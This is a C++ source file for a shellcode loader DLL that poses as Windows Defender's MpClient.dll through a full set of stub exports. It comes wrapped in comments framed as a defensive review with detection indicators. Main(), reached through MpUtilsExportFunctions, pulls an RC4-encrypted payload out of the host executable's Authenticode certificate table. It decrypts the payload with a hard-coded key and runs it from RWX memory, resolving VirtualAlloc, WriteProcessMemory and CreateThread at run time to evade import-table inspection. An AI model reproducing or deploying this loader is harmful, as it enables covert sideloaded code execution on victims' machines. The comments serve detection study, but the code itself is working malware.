// dllmain.cpp : DLL entry point.
//
// Reviewer summary (defensive reading of this file): the module exports the
// same symbol names as Windows Defender's MpClient.dll (see the stub exports at
// the bottom) and does nothing in DllMain. Its only real code path is Main(),
// reached through the MpUtilsExportFunctions export: it reads the host
// process's own executable from disk, looks for a 4-byte marker inside the
// Authenticode certificate directory, RC4-decrypts the bytes after it with a
// hard-coded key, copies the result into RWX memory and starts a thread on it.
// Points a detection engineer would key on from the visible code: a
// non-Microsoft DLL carrying this export set, a module re-reading its host EXE
// from disk, a PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory into the
// current process, and a thread whose start address is not module-backed.
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <WinTrust.h>
#include "malloc.h"

// Function-pointer types for the kernel32 APIs that Main() resolves with
// GetProcAddress at run time instead of calling through the import table.
typedef LPVOID(WINAPI* VirtualAllocFunc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL(WINAPI* WriteProcessMemoryFunc)(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten);
typedef HANDLE(WINAPI* CreateThreadFunc)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);

// RC4 stream cipher: key-scheduling over S using the key repeated into T,
// then the PRGA XORs keystream byte S[t] into each data byte. Because it is
// XOR based the same routine encrypts and decrypts, and `result` may alias
// `data` (Main() calls it in place). Requires keyLen > 0 -- `i % keyLen`
// divides by zero otherwise. dataLen is `long`; a negative value makes the
// output loop a no-op.
void Decrypt(unsigned char* data, long dataLen, unsigned char* key, long keyLen, unsigned char* result) {
    unsigned char T[256];
    unsigned char S[256];
    unsigned char tmp;
    int j = 0, t = 0, i = 0;
    // Initialise S as the identity permutation and T as the key repeated to
    // 256 bytes. The loop-local `i` shadows the outer `i`, which therefore
    // still holds 0 when the PRGA below starts.
    for (int i = 0; i < 256; i++) {
        S[i] = i;
        T[i] = key[i % keyLen];
    }
    // Key-scheduling: permute S according to T.
    for (int i = 0; i < 256; i++) {
        j = (j + S[i] + T[i]) % 256;
        tmp = S[j];
        S[j] = S[i];
        S[i] = tmp;
    }
    j = 0;
    // Pseudo-random generation: one keystream byte per input byte.
    for (int x = 0; x < dataLen; x++) {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        tmp = S[j];
        S[j] = S[i];
        S[i] = tmp;
        t = (S[i] + S[j]) % 256;
        // XOR the keystream byte into the output.
        result[x] = data[x] ^ S[t];
    }
}

// Locates, decrypts and executes the payload. See the file header for the
// defender-side summary. Resource handling is loose: hModuleFile is never
// closed, moduleData and decryptedData are never freed, and no Win32 return
// value after CreateFileA is checked.
void Main() {
    // Hard-coded RC4 key; it is a plain string in the binary.
    char encryptionKey[] = "123456";
    CHAR* encKey = encryptionKey;
    // A NULL hModule yields the path of the process's main executable, not of
    // this DLL, so the payload is expected in the host EXE's certificate
    // directory.
    char modulePath[MAX_PATH];
    GetModuleFileNameA(NULL, modulePath, MAX_PATH);
    // Open the host executable for reading.
    HANDLE hModuleFile = CreateFileA(modulePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hModuleFile == INVALID_HANDLE_VALUE) {
        return;
    }
    // File size is taken unchecked (GetFileSize reports failure as
    // INVALID_FILE_SIZE, which would be passed straight to new[]).
    DWORD fileSize = GetFileSize(hModuleFile, NULL);
    // Read the whole file into a heap buffer; neither the ReadFile result nor
    // bytesRead versus fileSize is checked before the headers are parsed.
    unsigned char* moduleData = new unsigned char[fileSize];
    DWORD bytesRead;
    ReadFile(hModuleFile, moduleData, fileSize, &bytesRead, NULL);
    // DOS header at offset 0 of the raw file image.
    IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)moduleData;
    // NT headers at e_lfanew (no bounds check against fileSize).
    IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)(moduleData + dosHeader->e_lfanew);
    // Security (Authenticode) data directory. Unlike other directories its
    // VirtualAddress field is a raw file offset, which is why adding it to the
    // file buffer below works on the on-disk image.
    DWORD certTableRVA = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress;
    DWORD certTableSize = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].Size;
    DWORD dataOffset = 0;
    unsigned char* pePtr = moduleData + certTableRVA;
    SIZE_T index = 0;
    // Scan the certificate table for the 4-byte marker FE ED FA CE. The
    // payload is taken to start 8 bytes after the marker's first byte; what the
    // 4 bytes between marker and payload hold is not visible in this file. The
    // comparison reads up to 3 bytes past certTableSize on the last iterations.
    for (index = 0; index < certTableSize; index++) {
        if (*(pePtr + index) == 0xfe && *(pePtr + index + 1) == 0xed && *(pePtr + index + 2) == 0xfa && *(pePtr + index + 3) == 0xce) {
            dataOffset = index + 8;
            break;
        }
    }
    // No marker: bail out (buffer and handle are leaked here too).
    if (dataOffset == 0) {
        return;
    }
    // Copy the payload out of the file image and RC4-decrypt it in place
    // (result aliases data). encryptedDataSize is DWORD and is narrowed to
    // `long` at the Decrypt call.
    DWORD encryptedDataSize = certTableSize - dataOffset;
    CHAR* decryptedData = (CHAR*)malloc(encryptedDataSize);
    memcpy(decryptedData, pePtr + dataOffset, encryptedDataSize);
    Decrypt((unsigned char*)decryptedData, encryptedDataSize, (unsigned char*)encKey, strlen(encKey), (unsigned char*)decryptedData);
    // VirtualAlloc / WriteProcessMemory / CreateThread are looked up through
    // GetProcAddress rather than linked, so they are absent from this module's
    // static import table. The allocation is PAGE_EXECUTE_READWRITE and the
    // write targets the current process; both are things an EDR rule can
    // observe at the API boundary.
    HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
    VirtualAllocFunc virtualAlloc = reinterpret_cast<VirtualAllocFunc>(GetProcAddress(hKernel32, "VirtualAlloc"));
    void* shellcode = virtualAlloc(NULL, encryptedDataSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemoryFunc writeProcessMemory = reinterpret_cast<WriteProcessMemoryFunc>(GetProcAddress(hKernel32, "WriteProcessMemory"));
    writeProcessMemory(GetCurrentProcess(), shellcode, decryptedData, encryptedDataSize, NULL);
    // Start a thread at the decrypted buffer -- a start address in unbacked,
    // non-module memory -- and block the caller forever (0xFFFFFFFF == INFINITE).
    CreateThreadFunc createThread = reinterpret_cast<CreateThreadFunc>(GetProcAddress(hKernel32, "CreateThread"));
    HANDLE hThread = createThread(0, 0, (LPTHREAD_START_ROUTINE)shellcode, 0, 0, 0);
    WaitForSingleObject(hThread, 0xFFFFFFFF);
}

// Entry point: takes no action on any notification. The payload path is
// reached only when the host calls the MpUtilsExportFunctions export below.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Stub exports. The names match the export table of Windows Defender's
// MpClient.dll; every one is empty except MpUtilsExportFunctions, which runs
// Main(). NOTE(review): presumably this is meant to let a host that imports
// these names load this file in place of the genuine library -- confirm
// against the real binary. For defenders, a DLL exposing this export set
// without a Microsoft signature is the obvious static indicator.
extern "C" __declspec(dllexport) void MpQueryEngineConfigDword() {}
extern "C" __declspec(dllexport) void MpGetSampleChunk() {}
extern "C" __declspec(dllexport) void MpConveySampleSubmissionResult() {}
extern "C" __declspec(dllexport) void MpSampleSubmit() {}
extern "C" __declspec(dllexport) void MpSampleQuery() {}
extern "C" __declspec(dllexport) void MpUpdateStart() {}
extern "C" __declspec(dllexport) void MpClientUtilExportFunctions() {}
extern "C" __declspec(dllexport) void MpConfigInitialize() {}
extern "C" __declspec(dllexport) void MpConfigOpen() {}
extern "C" __declspec(dllexport) void MpWDEnable() {}
extern "C" __declspec(dllexport) void MpUpdatePlatform() {}
extern "C" __declspec(dllexport) void MpConfigUninitialize() {}
extern "C" __declspec(dllexport) void MpConfigClose() {}
extern "C" __declspec(dllexport) void MpFreeMemory() {}
extern "C" __declspec(dllexport) void MpHandleClose() {}
extern "C" __declspec(dllexport) void MpThreatOpen() {}
extern "C" __declspec(dllexport) void MpThreatEnumerate() {}
extern "C" __declspec(dllexport) void MpScanResult() {}
extern "C" __declspec(dllexport) void MpManagerOpen() {}
extern "C" __declspec(dllexport) void MpScanControl() {}
extern "C" __declspec(dllexport) void MpScanStartEx() {}
extern "C" __declspec(dllexport) void MpCleanOpen() {}
extern "C" __declspec(dllexport) void MpCleanStart() {}
extern "C" __declspec(dllexport) void MpConfigGetValue() {}
extern "C" __declspec(dllexport) void MpUpdateStartEx() {}
extern "C" __declspec(dllexport) void MpManagerVersionQuery() {}
extern "C" __declspec(dllexport) void MpAddDynamicSignatureFile() {}
// The only export with a body: this is where the host's call turns into the
// payload path described in the file header.
extern "C" __declspec(dllexport) void MpUtilsExportFunctions() { Main(); }
extern "C" __declspec(dllexport) void MpAllocMemory() {}
extern "C" __declspec(dllexport) void MpConfigSetValue() {}
extern "C" __declspec(dllexport) void MpRemoveDynamicSignatureFile() {}
extern "C" __declspec(dllexport) void MpDynamicSignatureOpen() {}
extern "C" __declspec(dllexport) void MpDynamicSignatureEnumerate() {}
extern "C" __declspec(dllexport) void MpConfigGetValueAlloc() {}
extern "C" __declspec(dllexport) void MpGetTaskSchedulerStrings() {}
extern "C" __declspec(dllexport) void MpManagerStatusQuery() {}
extern "C" __declspec(dllexport) void MpConfigIteratorOpen() {}
extern "C" __declspec(dllexport) void MpConfigIteratorEnum() {}
extern "C" __declspec(dllexport) void MpConfigIteratorClose() {}
extern "C" __declspec(dllexport) void MpNetworkCapture() {}
extern "C" __declspec(dllexport) void MpConfigDelValue() {}
extern "C" __declspec(dllexport) void MpManagerEnable() {}
extern "C" __declspec(dllexport) void MpQuarantineRequest() {}
extern "C" __declspec(dllexport) void MpManagerStatusQueryEx() {}